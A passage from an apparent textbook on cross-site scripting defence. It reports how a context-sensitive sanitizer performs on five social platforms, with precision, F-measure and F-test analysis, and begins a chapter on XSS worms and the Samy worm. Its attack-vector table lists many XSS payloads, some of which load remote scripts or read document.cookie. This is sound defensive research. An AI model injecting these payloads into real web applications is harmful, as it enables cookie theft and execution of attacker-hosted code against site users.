    Return SCLU_Rep;
End

FIGURE 4.5 Algorithm of context-sensitive sanitization.

FIGURE 4.6 Detection rate of the proposed approach on different testing platforms.

4.3.1 Implementation Details
We implemented this approach in Java using the NetBeans IDE. We used a single desktop system comprising a 1.6 GHz AMD processor, 8 GB DDR RAM, and the Windows 7 operating system. We used XAMPP as the server to make the single system behave as the client as well as the server. A MySQL database is used at the backend. We utilized the jsoup [20] HTML parser to parse the HTTP response web page when it is first received at the client side. We used the distance-based clustering algorithm [3] in which text similarity is computed by the algorithm used in [22]. Sanitization of the clustered attack vector templates is done using ESAPI [9] sanitization functions. We tested the detection efficiency on five different platforms, as shown in Table 4.3. In terms of accuracy, we calculated the percentage of XSS attack vector payloads that were detected and nullified. When talking about the performance of the approach, we evaluated the issues encountered while executing our approach on the different platforms, loading different web pages, and dealing with a variety of context standards in HTML. Information related to the testing dataset is provided in the following section.

4.3.2 Categories of XSS Attack Vectors
We collected the XSS attack vector cheat sheets from five different repositories [1, 2, 9, 14, 15, 27]. The collected dataset contains old as well as new attack vectors of different contexts. Table 4.4 shows the different categories of malicious XSS attack vector payloads, including HTML malicious tags, JavaScript attack vectors, CSS attack vectors, URL attack vectors, and HTML malicious event handlers. These attack vectors also include HTML5 attack vectors. This was done to evaluate the XSS attack vector mitigation capability of the approach on open source social media web applications.

TABLE 4.3 Testing Platforms
Application   Version   Source language
Elgg          1.8.16    PHP
WordPress     3.6.1     PHP
Humhub        0.10.0    PHP and jQuery
Joomla        3.2.0     PHP
Drupal        7.23      PHP

TABLE 4.4 Categories of XSS Attack Vectors

Context: HTML Malicious Tag
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
<DIV STYLE=”background- image:\0075\0072\006C\0028’\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029’\0029”>
<DIV STYLE=”background-image: url(&#1;javascript:alert(‘XSS’))”>
<DIV STYLE=”width: expression(alert(‘XSS’));”>
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<BODY> <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"> <?import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert("XSS")</SCRIPT>"> </BODY>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">

Context: JavaScript Attack Vectors
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Context: Cascading Style Sheet (CSS) Attack Vectors
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

Context: URL Attack Vectors
<a onmouseover="alert(document.cookie)">xxs link</a>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>

Context: HTML Malicious Event Handler
<img src=asdf onerror=alert(document.cookie)>
%22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src=http://my.box.com/xss.js%3E%3C/script%3E%22)’%3E
<video onerror="alert(1)"><source></source></video>
<IMG SRC= onmouseover="alert('xss')">
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG SRC=# onmouseover="alert('xxs')">

4.3.3 Detection Outcome


Initially, we observed the results using a total of 127 XSS attack vec-
tor on fve testing platforms. Te experimental results are shown
in Table 4.5. Te ease with which we are integrating our proposed
approach on the testing platforms is showing its fexible compat-
ibility. It is clearly refected from the Table 4.6 that very few false
positives and false negatives are observed in all fve testing plat-
forms. We also calculated the XSS attack payload detection rate
96 ◾ Cross-Site Scripting Attacks

TABLE 4.5 Observed Results on Different Testing Platforms

Attack Vector Category          Malicious Scripts Injected   # of TP   # of FP   # of TN   # of FN
Elgg
  HTML Malicious Tags           35                           32        1         1         1
  JavaScript Attack Vectors     20                           18        1         1         0
  CSS Attack Vectors            15                           13        1         0         1
  URL Attack Vectors            22                           20        2         0         0
  HTML Malicious Event Handler  35                           33        0         2         0
WordPress
  HTML Malicious Tags           35                           33        2         0         0
  JavaScript Attack Vectors     20                           18        0         2         0
  CSS Attack Vectors            15                           14        1         0         0
  URL Attack Vectors            22                           18        1         2         1
  HTML Malicious Event Handler  35                           32        1         1         1
Humhub
  HTML Malicious Tags           35                           31        3         1         0
  JavaScript Attack Vectors     20                           17        1         1         1
  CSS Attack Vectors            15                           12        2         1         0
  URL Attack Vectors            22                           19        1         2         0
  HTML Malicious Event Handler  35                           33        0         1         1
Joomla
  HTML Malicious Tags           35                           32        2         1         0
  JavaScript Attack Vectors     20                           17        0         2         1
  CSS Attack Vectors            15                           13        1         1         0
  URL Attack Vectors            22                           20        1         1         0
  HTML Malicious Event Handler  35                           32        2         0         1
Drupal
  HTML Malicious Tags           35                           33        2         0         0
  JavaScript Attack Vectors     20                           18        0         2         0
Sanitization Mechanisms for Defending against XSS Attack    ◾   97

TABLE 4.5 (CONTINUED) Observed Results on Different Testing Platforms

Attack Vector Category          Malicious Scripts Injected   # of TP   # of FP   # of TN   # of FN
Drupal (continued)
  CSS Attack Vectors            15                           13        2         0         0
  URL Attack Vectors            22                           20        2         0         0
  HTML Malicious Event Handler  35                           33        0         1         1

for all five testing platforms. This is done by dividing the number of XSS attack payloads detected by the number of malicious scripts injected for each category of attack vector. Figure 4.6 highlights the detection rate of the five OSN web applications with respect to the individual categories of attack vectors. According to Figure 4.6, the highest detection rate is observed on Elgg compared with the other OSN-based web application platforms.

4.4 PERFORMANCE ANALYSIS


This section provides the performance assessment of the proposed approach. So far, we have shown how effective the proposed approach is against XSS attacks by testing it on five social media platforms. Here, we analyze the performance using two statistical analysis methods: the F-measure and the F-test hypothesis.

4.4.1 Using F-Measure


The F-measure is the harmonic mean of two values, precision and recall. It is calculated to determine the accuracy of the experimental testing conducted for the proposed approach. We compute all of these parameters from the equations given below:

\[
\text{False Positive Rate (FPR)} = \frac{FP}{FP + TN}
\]

\[
\text{False Negative Rate (FNR)} = \frac{FN}{FN + TP}
\]

\[
\text{Precision} = \frac{TP}{TP + FP}
\]

\[
\text{Recall} = \frac{TP}{TP + FN}
\]

\[
\text{F-Measure} = \frac{2\,TP}{2\,TP + FP + FN}
\]

TABLE 4.6 Performance Analysis by Calculating F-Measure

Web Application   Total   # of TP   # of FP   # of TN   # of FN   Precision   FPR     FNR     Recall   F-Measure
Elgg              127     116       5         4         2         0.958       0.556   0.016   0.983    0.970
WordPress         127     115       5         5         2         0.958       0.5     0.017   0.982    0.970
Humhub            127     112       7         6         2         0.941       0.538   0.017   0.982    0.961
Joomla            127     114       6         5         2         0.950       0.545   0.017   0.982    0.967
Drupal            127     117       6         3         1         0.951       0.67    0.008   0.991    0.970

Here, we calculate the precision, recall, and finally the F-measure on the basis of the experimental results observed on the five different platforms. The F-measure analyzes the performance of a system by calculating the harmonic mean of precision and recall. The analysis reveals that the proposed approach performs well, since the observed F-measure on every web application platform is greater than 0.9. Table 4.6 lists the values of the above parameters for the five testing platforms. Note that all of these metrics are computed over the same 127 injected malicious payloads per platform, so the FPR rests on only 9 to 13 negative samples (FP + TN) per platform and should be read with less weight than precision, recall, and F-measure.

4.4.2 Using F-test Hypothesis


It is always better to support a claim with as many methods as possible, so we used the F-test hypothesis method as a second supporting method for determining the performance. In the F-test hypothesis method, we define two hypotheses, of which only one holds in the end. These are:

• Null Hypothesis: the number of malicious XSS attack vector payloads injected (S1) is equal to the number of injected scripts detected (S2), i.e. S1 = S2.

• Alternate Hypothesis: since the ideal situation cannot be assumed, this hypothesis states that the number of malicious scripts injected (S1) is greater than the number of scripts detected (S2), i.e. S1 > S2.

The level of significance is α = 0.05. The statistics of the XSS attack vector payloads applied and detected are given in Tables 4.7 and 4.8. In our work, we used a total of 127 XSS attack vectors for testing each of the five platforms individually. Note, however, that for evaluating the performance of the proposed approach with the F-test, we injected a different number of XSS attack vectors into each of the five web applications.

For scripts injected, we have

Number of Malicious Scripts Injected, mean (μ) = 122
Number of Observations (N1) = 5
Degrees of Freedom (df1) = N1 − 1 = 4
S1 = 2.549

For scripts detected, we have

Number of Malicious Scripts Detected, mean (μ) = 116
Number of Observations (N2) = 5
Degrees of Freedom (df2) = N2 − 1 = 4
S2 = 3.905

Now, the value of the F statistic is

\[
F_{CALC} = \frac{S_1^2}{S_2^2} = \frac{6.4974}{15.249} = 0.4260
\]

TABLE 4.7 Statistics of XSS Attack Vectors Applied

# of Malicious Scripts Injected (Xi)   (Xi − μ)   (Xi − μ)^2
122                                      0          0
125                                      3          9
120                                     −2          4
119                                     −3          9
124                                      2          4

Mean \(\mu = \frac{1}{N_1}\sum_{i=1}^{N_1} X_i = 122\), \(\sum_{i=1}^{N_1}(X_i - \mu)^2 = 26\), and the standard deviation is
\[
S_1 = \sqrt{\frac{\sum_{i=1}^{N_1}(X_i - \mu)^2}{N_1 - 1}} = \sqrt{\frac{26}{4}} = 2.549
\]

TABLE 4.8 Statistics of XSS Attack Vectors Detected

# of Malicious Scripts Detected (Xi)   (Xi − μ)   (Xi − μ)^2
120                                      4         16
118                                      2          4
117                                      1          1
110                                     −6         36
118                                      2          4

Mean \(\mu = \frac{1}{N_2}\sum_{i=1}^{N_2} X_i = 116\), \(\sum_{i=1}^{N_2}(X_i - \mu)^2 = 61\), and the standard deviation is
\[
S_2 = \sqrt{\frac{\sum_{i=1}^{N_2}(X_i - \mu)^2}{N_2 - 1}} = \sqrt{\frac{61}{4}} = 3.905
\]

(The exact mean of the detected sample is 583/5 = 116.6; the table uses the rounded value 116, which is why the deviations in the second column sum to 3 rather than 0. Using the exact mean gives S2 = 3.847 and F_CALC = 0.439, which does not change the conclusion below.)

We have found that the tabulated value of the F-test at df1 = 4, df2 = 4 and α = 0.05 is

\[
F(df_1, df_2, 1 - \alpha) = F(4, 4, 0.95) = 6.3882
\]

Here, we observe that the calculated F value is smaller than the tabulated F value for the same parameters, i.e. F_CALC < F_Tabulated. The test therefore does not reject the null hypothesis at α = 0.05: the difference between the two sample standard deviations is within what random error would produce, and the number of scripts detected does not differ significantly from the number of scripts injected.
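To check the figures of Sections 4.4.1 and 4.4.2 against the published counts, the following Python is an added example and not the chapter's own code: it recomputes precision, recall, FPR, FNR, and F-measure from the Table 4.6 counts, and the F statistic from the Table 4.7 and 4.8 samples. The critical value 6.3882 is taken from the text, not computed. The code uses the exact mean of the detected sample (583/5 = 116.6) rather than the rounded 116, so S2 and F_CALC come out at 3.847 and 0.439 instead of 3.905 and 0.426, with the same conclusion; it also shows the Elgg FPR as 5/9 = 0.556.

```python
"""Recompute the Chapter 4 evaluation figures from the published counts (added example)."""
import math

# Per-platform confusion counts (TP, FP, TN, FN) copied from Table 4.6.
TABLE_4_6 = {
    "Elgg": (116, 5, 4, 2),
    "WordPress": (115, 5, 5, 2),
    "Humhub": (112, 7, 6, 2),
    "Joomla": (114, 6, 5, 2),
    "Drupal": (117, 6, 3, 1),
}

# Samples used for the F-test, copied from Tables 4.7 and 4.8.
INJECTED = [122, 125, 120, 119, 124]
DETECTED = [120, 118, 117, 110, 118]

# Critical value F(4, 4, 0.95) as quoted in Section 4.4.2; it is not computed here.
F_CRITICAL_4_4_095 = 6.3882


def metrics(tp, fp, tn, fn):
    """Precision, recall, FPR, FNR and F-measure as defined in Section 4.4.1."""
    return {
        "precision": tp / (tp + fp),
        "recall": tp / (tp + fn),
        "fpr": fp / (fp + tn),
        "fnr": fn / (fn + tp),
        "f_measure": 2 * tp / (2 * tp + fp + fn),
    }


def metrics_table(counts=TABLE_4_6, digits=3):
    """Table 4.6 recomputed; compare each row with the published one."""
    return {name: {k: round(v, digits) for k, v in metrics(*c).items()}
            for name, c in counts.items()}


def sample_std(xs):
    """Sample standard deviation with N-1 in the denominator and the exact mean."""
    mu = sum(xs) / len(xs)
    return math.sqrt(sum((x - mu) ** 2 for x in xs) / (len(xs) - 1))


def f_test(injected=INJECTED, detected=DETECTED, f_critical=F_CRITICAL_4_4_095):
    """Ratio of sample variances against the tabulated critical value.

    F_calc below the critical value means the null hypothesis (equal spread of the
    injected and detected counts) is not rejected at alpha = 0.05.
    """
    s1, s2 = sample_std(injected), sample_std(detected)
    f_calc = s1 ** 2 / s2 ** 2
    return {"s1": s1, "s2": s2, "f_calc": f_calc, "reject_null": f_calc > f_critical}


if __name__ == "__main__":
    for platform, row in metrics_table().items():
        print(platform, row)
    print(f_test())
```

Running the script prints one recomputed row per platform followed by the F-test result; any row that disagrees with Table 4.6 beyond the third decimal is either a rounding difference or, as for the Elgg FPR, an arithmetic slip in the published table.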

4.4.3 Comparative Analysis


This subsection compares our proposed approach with other recent XSS defensive methodologies. Table 4.9 compares the existing sanitization-based state-of-the-art techniques with our work on nine identified metrics: Category of XSS attack Detected (COXD), Inclusion of Legitimate Inputs (ILI), Detection of Malicious JavaScript Functions (DMJSF), Automated Pre-processing Required (APR), XSS attack Detection Proficiency (XDP), Source Code Monitoring (SCMon), Source Code Modification (SCMod), Scrutinizing Mechanism (SCMech), and Context-Aware Sanitization (CAS).
Most of the existing techniques require extensive pre-processing of the web application's framework before they run successfully across different browser platforms. Few of them perform context-aware sanitization; instead, they sanitize the XSS attack vectors in a context-insensitive manner, and such conventional sanitization is easily bypassed by attackers because a value that is harmless in one output context (HTML text) can still be an attack in another (an attribute, a URL, or a script).
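The bypass described above comes from encoding a value for the wrong output context. The following Python is an added example, not code from this chapter or from any of the tools compared in Table 4.9: `naive_sanitize` applies a single HTML-entity pass regardless of where the value is written, while `encode_html_text`, `encode_attr`, and `encode_url` each encode for one context. The payload shapes are those in the URL and event-handler rows of the attack-vector table (javascript: URLs, protocol-relative //host, user-info @ tricks, octal IP hosts, unquoted attribute breakouts). The function names, the `#` fallback for a refused URL, and the restriction to http/https are assumptions of this example.

```python
"""Context-insensitive versus context-aware output encoding (added example)."""
import html
import re
from urllib.parse import urlsplit

SAFE_SCHEMES = {"http", "https"}


def naive_sanitize(value):
    """Context-insensitive: one entity pass, no matter where the value is written."""
    return html.escape(value, quote=False)


def encode_html_text(value):
    """HTML body context: <, >, &, " and ' become entities."""
    return html.escape(value, quote=True)


def encode_attr(value):
    """Attribute context: always quoted, quotes encoded so the value cannot close it."""
    return '"' + html.escape(value, quote=True) + '"'


def _host_ok(host):
    """Allow DNS-style names and canonical dotted-decimal IPv4 only (no IPv6 here)."""
    labels = host.split(".")
    if all(label.isdigit() for label in labels if label):
        # Numeric host: reject octal/hex/integer spellings such as 0102.0146.0007.00000223
        return len(labels) == 4 and all(
            label == "0" or (label[0] != "0" and int(label) <= 255) for label in labels)
    return re.fullmatch(r"[a-z0-9-]+(\.[a-z0-9-]+)*\.?", host) is not None


def encode_url(value):
    """URL context: the URL if it may go into href/src, None if it must be refused."""
    # Browsers strip tab/CR/LF while parsing a scheme, so 'java\tscript:' still runs.
    v = re.sub(r"[\x00-\x1f]", "", value).strip()
    if re.match(r"^[/\\]{2}", v):
        return None  # protocol-relative (//host, /\host): resolves off-site
    parts = urlsplit(v)
    if parts.scheme:
        if parts.scheme.lower() not in SAFE_SCHEMES:
            return None  # javascript:, data:, vbscript: and friends
        if "@" in parts.netloc:
            return None  # http://trusted@evil: 'trusted' is user-info, the host is 'evil'
        try:
            _ = parts.port  # a non-numeric port (http://google:ha.ckers.org) raises
        except ValueError:
            return None
        if not _host_ok(parts.hostname or ""):
            return None
    elif parts.netloc:
        return None
    return v


def render_link_naive(text, href):
    """The pattern that gets bypassed: one escaping pass and an unquoted attribute."""
    return "<a href=%s>%s</a>" % (naive_sanitize(href), naive_sanitize(text))


def render_link(text, href):
    """Each value is encoded for the context it is written into."""
    safe_href = encode_url(href)
    if safe_href is None:
        safe_href = "#"  # refuse the URL; never fall back to the raw value
    return "<a href=%s>%s</a>" % (encode_attr(safe_href), encode_html_text(text))


if __name__ == "__main__":
    # Constructed payloads in the shapes listed in the attack-vector table above.
    for href in ("javascript:document.location='http://www.google.com/'",
                 "//google", "http://ha.ckers.org@google",
                 "http://0102.0146.0007.00000223/", "x onmouseover=alert(document.cookie)"):
        print(render_link_naive("XSS", href))
        print(render_link("XSS", href))
```

The naive renderer passes every one of these payloads through untouched, because none of them contains `<`, `>`, or `&`; the context-aware renderer refuses the four unsafe URLs and turns the attribute breakout into a harmless quoted relative URL. The allow-list for hosts is deliberately strict, so IPv6 literals and internationalized names would need to be added explicitly.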

TABLE 4.9 Summary of Comparison of Existing XSS Defensive Methodologies with Our Work

Technique               COXD               ILI   DMJSF   APR   XDP          SCMon   SCMod   SCMech    CAS
Livshits et al. [21]    Reflected          Yes   No      Yes   Medium       Yes     Yes     Passive   No
Samuel et al. [23]      Reflected, Stored  Yes   No      Yes   Low          Yes     No      Passive   Yes
Saxena et al. [25]      Reflected          No    Yes     No    Medium       No      Yes     Active    No
Saxena et al. [26]      Reflected          Yes   No      Yes   Low          Yes     Yes     Passive   No
Hooimeijer et al. [16]  Reflected, Stored  Yes   Yes     No    Medium       No      Yes     Passive   No
Balzarotti et al. [4]   Reflected          Yes   No      Yes   Medium       Yes     No      Active    No
Our Work                Stored, Reflected  No    Yes     No    Acceptable   No      No      Active    Yes

4.5 CHAPTER SUMMARY

Web applications over the internet provide numerous services including online shopping, banking, social interaction, online conferences, video chat, etc. Among all of these, social media is the fastest-growing network. It allows its users to interact with anyone across the globe irrespective of geographical distance. In addition, it is used to share personal and professional information in the form of posts, albums, messages, etc. This feature of social networks attracts security challenges such as Cross-Site Scripting (XSS) attacks. Therefore, in this chapter we have presented an approach to detect and mitigate XSS attacks. It works by intercepting two critical points on the proliferation path of an XSS attack: (1) illegitimate requests to the server and (2) access to the views on the client side. It is a novel technique that can effectively defend against XSS attacks. The performance analysis of the proposed approach has revealed that the framework recognizes XSS attacks with very low false positives and false negatives, and with acceptable performance overhead compared to existing XSS defensive methodologies.

REFERENCES
1. 523 XSS vectors available. [online] Available at: http://xss2.technomancie.net/vectors.
2. @XSS vector twitter account. [online] Available at: https://twitter.com/XSSVector.
3. Aggarwal, C. C., & Zhai, C. (2012). A survey of text clustering algorithms. In Mining Text Data (pp. 77–128). Springer, Boston, MA.
4. Balzarotti, D., Cova, M., Felmetsger, V., Jovanovic, N., Kirda, E., Kruegel, C., & Vigna, G. (2008). Saner: Composing static and dynamic analysis to validate sanitization in web applications. In IEEE Symposium on Security and Privacy, SP 2008 (pp. 387–401). IEEE, Oakland, CA.
5. Chaudhary, P., & Gupta, B. B. (2018). Plague of cross-site scripting on web applications: A review, taxonomy and challenges. International Journal of Web Based Communities, 14(1), 64–93.
6. Chaudhary, P., Gupta, B. B., & Gupta, S. (2019). A framework for preserving the privacy of online users against XSS worms on online social network. International Journal of Information Technology and Web Engineering, 14(1), 85–111.
7. Drupal social networking site. [online] Available at: https://www.drupal.org/download.
8. Elgg social networking engine. [online] Available at: https://elgg.org.
9. ESAPI, OWASP Enterprise Security API. (2009). [online] Available at: http://www.owasp.org/index.php/ESAPI#tab=Project_Details (accessed February 2010).
10. Gupta, B. B., & Agrawal, D. P. (eds.). (2019). Handbook of Research on Cloud Computing and Big Data Applications in IoT. IGI Global.
11. Gupta, B. B., Gupta, S., & Chaudhary, P. (2017). Enhancing the browser-side context-aware sanitization of suspicious HTML5 code for halting the DOM-based XSS vulnerabilities in cloud. International Journal of Cloud Applications and Computing, 7(1), 1–31.
12. Gupta, B. B., & Sheng, Q. Z. (eds.). (2019). Machine Learning for Computer and Cyber Security: Principle, Algorithms, and Practices. CRC Press.
13. Gupta, S., & Gupta, B. B. (2015, May). PHP-sensor: A prototype method to discover workflow violation and XSS vulnerabilities in PHP web applications. In Proceedings of the 12th ACM International Conference on Computing Frontiers (p. 59). ACM.
14. Hansen, R. XSS (cross site scripting) cheat sheet. Filter evasion cheat sheet. [online] Available at: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
15. Heiderich, M. HTML5 security cheatsheet. [online] Available at: http://html5sec.org.
16. Hooimeijer, P., Livshits, B., Molnar, D., Saxena, P., & Veanes, M. (2011). Fast and precise sanitizer analysis with BEK. In Proceedings of the 20th USENIX Conference on Security (pp. 1–1). USENIX Association.
17. Humhub social networking site. [online] Available at: https://www.humhub.org/en.
18. Joomla social networking site. [online] Available at: https://www.joomla.org/download.html.
19. Joshi, R. C., & Gupta, B. B. (eds.). (2019). Security, Privacy, and Forensics Issues in Big Data. IGI Global.
20. Jsoup HTML parser. [online] Available at: https://jsoup.org/.
21. Livshits, B., & Chong, S. (2013). Towards fully automatic placement of security sanitizers and declassifiers. ACM SIGPLAN Notices, 48(1), 385–398.
22. Metzler, D., Dumais, S., & Meek, C. (2007). Similarity measures for short segments of text. In European Conference on Information Retrieval. Springer, Berlin, Heidelberg.
23. Samuel, M., Saxena, P., & Song, D. (2011). Context-sensitive auto-sanitization in web templating languages using type qualifiers. In Proceedings of the 18th ACM Conference on Computer and Communications Security (pp. 587–600). ACM.
24. Sarmah, U., Bhattacharyya, D. K., & Kalita, J. K. (2018). A survey of detection methods for XSS attacks. Journal of Network and Computer Applications, 118, 113–143.
25. Saxena, P., Hanna, S., Poosankam, P., & Song, D. (2010). FLAX: Systematic discovery of client-side validation vulnerabilities in rich web applications. In NDSS Symposium.
26. Saxena, P., Molnar, D., & Livshits, B. (2011). SCRIPTGARD: Automatic context-sensitive sanitization for large-scale legacy web applications. In Proceedings of the 18th ACM Conference on Computer and Communications Security (pp. 601–614). ACM, Chicago, IL.
27. Technical attack sheet for cross site penetration tests. [online] Available at: http://www.vulnerability-lab.com/resources/documents/531.txt.
28. WordPress. [online] Available at: http://wordpress.org/.
29. XSS filter evasion cheat sheet. [online] Available at: https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet.
30. Zhang, Z., & Gupta, B. B. (2018). Social media security and trustworthiness: Overview and new direction. Future Generation Computer Systems, 86, 914–925.
CHAPTER 5

Real-World XSS Worms and Handling Tools

In this chapter, we discuss the XSS worm. The chapter presents information related to the XSS worm, including its lifecycle, real-world incidents, and the types of XSS worm. This theory about the XSS worm is supported by a case study of one of the most dangerous XSS worms, the Samy worm. In addition, we present the handling tools that assist in detecting and alleviating the effects of the XSS worm.

5.1 OVERVIEW OF XSS WORM

By some estimates, approximately 80 percent of web applications are affected by XSS vulnerabilities. The major reasons for their existence are security negligence while developing web applications and improper validation of the input that users enter into the input fields of web sites. One of the major motives of an attacker is to infect as many users of a system as possible. This possibility exists because of XSS vulnerabilities in web applications [3, 4, 9, 11, 13, 14, 15, 26]. The XSS worm [5] is the weapon in the attacker's hands for achieving this objective. An XSS worm is a malicious vector that abuses an XSS vulnerability and attempts to infect many users' systems when they visit the infected web site, by propagating itself to their profiles or browsers. Its infection occurs in two stages: first, the server is tainted by storing a persistent XSS payload, which the server itself does not execute. Second, the browser is infected when the stored payload executes. The payload can then assist in launching a DDoS attack and performing other malicious activities [7, 8, 10]. The relationship from server to browser is one-to-many, as one server can infect multiple browsers [2].

5.1.1 Real-World Incidences of XSS Worm

Various industries have been infected by XSS worms [12]. A recent study by Faghani et al. [5] discusses the many real XSS worms that have infected nearly all of the major online applications. The XSS worm differs from conventional viruses: a virus generally resides and executes on the same system, whereas the XSS worm runs in the browser and its code is stored on the server. Also, unlike a conventional virus, the XSS worm is platform independent because it is encapsulated in HTML and HTTP, which every browser supports; this makes the infection space of an XSS worm wider and more dangerous. Table 5.1 lists XSS worms that have infected many popular platforms on the internet [4]. For many years, attackers have repeatedly used these worms to contaminate more web applications. Gaia is an XSS worm that infected gaming web applications. The Renren worm severely hit the Renren social network. The Yamanner XSS worm was discovered in Yahoo! Mail. Facebook was also contaminated by the Boonana XSS worm. Table 5.1 shows that XSS worms have contaminated popular web applications serving large numbers of people around the globe, so that they can infect as many users as possible. Over the years, these worms have spread across all web applications that provide a platform for XSS worms to proliferate. An XSS worm is most likely to originate in web applications with community-driven characteristics like social networking, forums, blogs, web mail, chat rooms, etc.

TABLE 5.1 Real-World XSS Worms

XSS Worm Incident    Year
Facebook worm        2011
Boonana              2010
OnMouseOver          2010
Flash-based worm     2009
Renren               2009
Mikeyy               2009
XSS bug              2009
Justin.tv worm       2008
W32/Kutwormer        2007
Gaia                 2007
Hi5                  2007
Bom Sabado           2007
MW.orc               2006
Space flash          2006
Yamanner             2006
Xanga                2005
Samy                 2005

5.1.2 Case Study of the Famous Samy Worm


In 2005, one worm altered the profiles of over a million users of the highly prominent and beloved social media platform MySpace. This worm was developed by Samy Kamkar, and it is known as the "Samy worm" [27]. The worm was written in JavaScript that MySpace's filters did not remove. His main goal was to become famous by adding more friends to his friends list. Samy first posted the malicious code on his own profile page. Therefore, whenever a legitimate MySpace user visited Samy's profile, the malicious payload forced the user's browser to add Samy to the user's friends list using XMLHttpRequest (XHR). The worm also posted the message "Samy is my hero" on the victim's profile page and infected that profile with a copy of itself. In this way, the worm abused more than 1 million legitimate MySpace users within a period of 20 hours. Figure 5.1 depicts the number of users infected by different worms and shows that Samy's infection rate far exceeds that of the other worms compared [6]. The figure provides a comparative analysis of the infection rate of the Samy worm against worms such as Code Red I and Code Red II.

The worm forced MySpace to be taken offline to fix the vulnerability. Samy gained control of over 1 million accounts. Consider what could happen with control over that many accounts, and with the aggregate network bandwidth of that many browsers, some of them also logged in to Gmail, bank accounts, trading platforms, and so on. From this, we can estimate the effects of an XSS worm: the attacker might be able to launch a large-scale DDoS attack.

But what makes the Samy worm propagate at such a high rate when other worms cannot? Let's discuss this in detail. Other internet worms such as Code Red I propagate through the network by peer-to-peer distribution, which causes network congestion, eventually slows the propagation, and finally collapses. The XSS worm, by contrast, distributes through a central point, the server. It executes on the client side, so no peer-to-peer distribution takes place and the network is not overburdened. Every user who visits an infected profile is therefore a potential target of the XSS worm, and since the worm is also platform independent, its infection rate is higher and more dangerous.

FIGURE 5.1 Number of users infected by different worms.

5.2 LIFE CYCLE OF XSS WORM

Unlike other worms, the XSS worm infects only web browsers and distributes itself by copying its malicious code into other places, for example by posting comments with embedded malicious code to infect other users. To develop efficient and robust solutions for confining the infection rate of any worm, it is best to understand the worm's life cycle. So, in this section, we discuss the stages through which a worm passes during its life [4]. Figure 5.2 highlights these stages.

1. Vulnerability Abuse: In the initial phase, the attacker entices the victim to visit a web site into which the attacker has inserted the malicious XSS worm code. This worm code is highly obfuscated and is capable of propagating itself into the user's profile. The attacker injects the XSS worm into the web site by abusing an XSS vulnerability.
2. Privilege Capturing: The malicious code executes in the victim's browser, so the attacker gains all the rights or privileges the user possesses on the infected web site. Thereby, the worm can automatically send malicious messages to the victim's friends.
